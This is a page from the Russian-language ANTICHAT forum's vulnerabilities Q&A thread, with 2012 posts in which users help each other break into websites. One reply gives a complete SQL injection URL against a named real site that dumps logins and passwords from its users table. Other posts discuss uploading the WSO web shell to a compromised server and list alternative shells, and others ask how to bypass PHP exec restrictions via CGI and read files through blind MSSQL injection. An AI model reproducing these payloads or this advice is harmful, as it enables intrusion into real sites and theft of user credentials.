HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2130 из 2438 « Первая < 11301630203020802120 2126 2127 2128 2129 2130 2131 2132 2133 2134 214021802230 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #21291  
Старый 03.09.2012, 02:27
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от stan_q  
stan_q said:
Есть freebsd, в php отключены popen,exec,system,passthru,proc_open,shell_exec.
Делал в отдельной папке, чмод 755 на скрипт, папка тоже 755, htaccess с текстом
Код:
Code:
Options +ExecCGI
AddHandler cgi-script cgi pl
При обращении к скрипту через браузер получаю исходный код.
Может, неверно указывал пути к перлу, но проверить это не могу, т.к. open_base_dir, пробовал самые распространенные.
Как можно запустить перл скрипт из браузера?
Возможно там Perl и нет, если .htaccess действителен, то вам нужно указать путь какой либо исполняемого файла, к примеру /usr/bin/python, так-же может иметься возможность написать приложение на C++.
 
Ответить с цитированием

  #21292  
Старый 03.09.2012, 03:52
DeepXhadow
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695

Репутация: 19
По умолчанию
Приветствую! Есть слепая скуля на MS SQL Server'е... можно ли как-нить читать файлики на сервере, юзая блинд? права SYSTEM
 
Ответить с цитированием

  #21293  
Старый 03.09.2012, 08:43
foma9999
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018

Репутация: 0
По умолчанию
Ошибки следующего вида при подставлении ' в строку

http://i.imgur.com/ZErAT.png

Но когда перебираю +UNION+SELECT+1,2,..+--+

Ничего не исчезает!

До 30ти перебирал.

Как раскрутить эту sql?
 
Ответить с цитированием

  #21294  
Старый 03.09.2012, 16:44
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от foma9999  
foma9999 said:
Ошибки следующего вида при подставлении ' в строку
http://i.imgur.com/ZErAT.png
Но когда перебираю +UNION+SELECT+1,2,..+--+
Ничего не исчезает!
До 30ти перебирал.
Как раскрутить эту sql?
пантамимой не занимаемся, скиньте URL или не задавайте подобные вопросы на которые просто не возможно ответить
 
Ответить с цитированием

  #21295  
Старый 03.09.2012, 16:55
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию
foma9999,

Код:
Code:
http://www.advis.ru/gotovye-issledovaniya/page.php?ID=-20839'+union+select+1,group_concat(login,0x3a,password),3,4,5,6,7,8,9,0,11,concat_ws(0x3a,version(),user(),database()),13,14,15,16,17,18,19,20,21,22+from+users--+
 
Ответить с цитированием

  #21296  
Старый 04.09.2012, 20:54
RColor
Guest
Сообщений: n/a
Провел на форуме:
588

Репутация: 0
По умолчанию
Цитата:
Сообщение от M_script  
M_script said:
Сообщи администрации лагеря об уязвимости и получи бесплатную путевку на следующий сезон.
Спасибо тебе за дружеский совет ,

но я интересуюсь не для нажива ради, а только с целью научиться что делать в подобных ситуациях, в данном случае Артек подвернулся под руку...
 
Ответить с цитированием

  #21297  
Старый 05.09.2012, 14:35
dynda2000
Guest
Сообщений: n/a
Провел на форуме:
2422

Репутация: 0
По умолчанию
phpmyadmin 3.3.8

Зашел на /pma/setup/index.php создал сервер с именем alert("like this")



Подскажите плиз как можно это использовать?
 
Ответить с цитированием

  #21298  
Старый 05.09.2012, 18:44
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию
залил на серв wso и на тебе:

Warning: gzinflate() has been disabled for security reasons in путь : regexp code on line 1

первый раз с таким сталкиваюсь , я так понял эта функция отключена(гуглил ,но не понял насколько эта функция критична для вебшелла) какой тогда шелл попробывать?
 
Ответить с цитированием

  #21299  
Старый 05.09.2012, 19:13
kroŧ
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830

Репутация: 4
По умолчанию
blesse любой где не используется эта функция, wso не пакованный, c99, c100, r57, Safe0ver и тд..
 
Ответить с цитированием

  #21300  
Старый 07.09.2012, 17:41
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от LelouchMe  
LelouchMe said:
Ребят, а что тут? http://grandis.me/index.php?f=stat&act=pk&sid=1'+UNION+SELECT+1,2,3, 4,5,6,7,8,9,10,11+--+
это не скуля
 
Ответить с цитированием
Ответ
Страница 2130 из 2438 « Первая < 11301630203020802120 2126 2127 2128 2129 2130 2131 2132 2133 2134 214021802230 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT.XYZ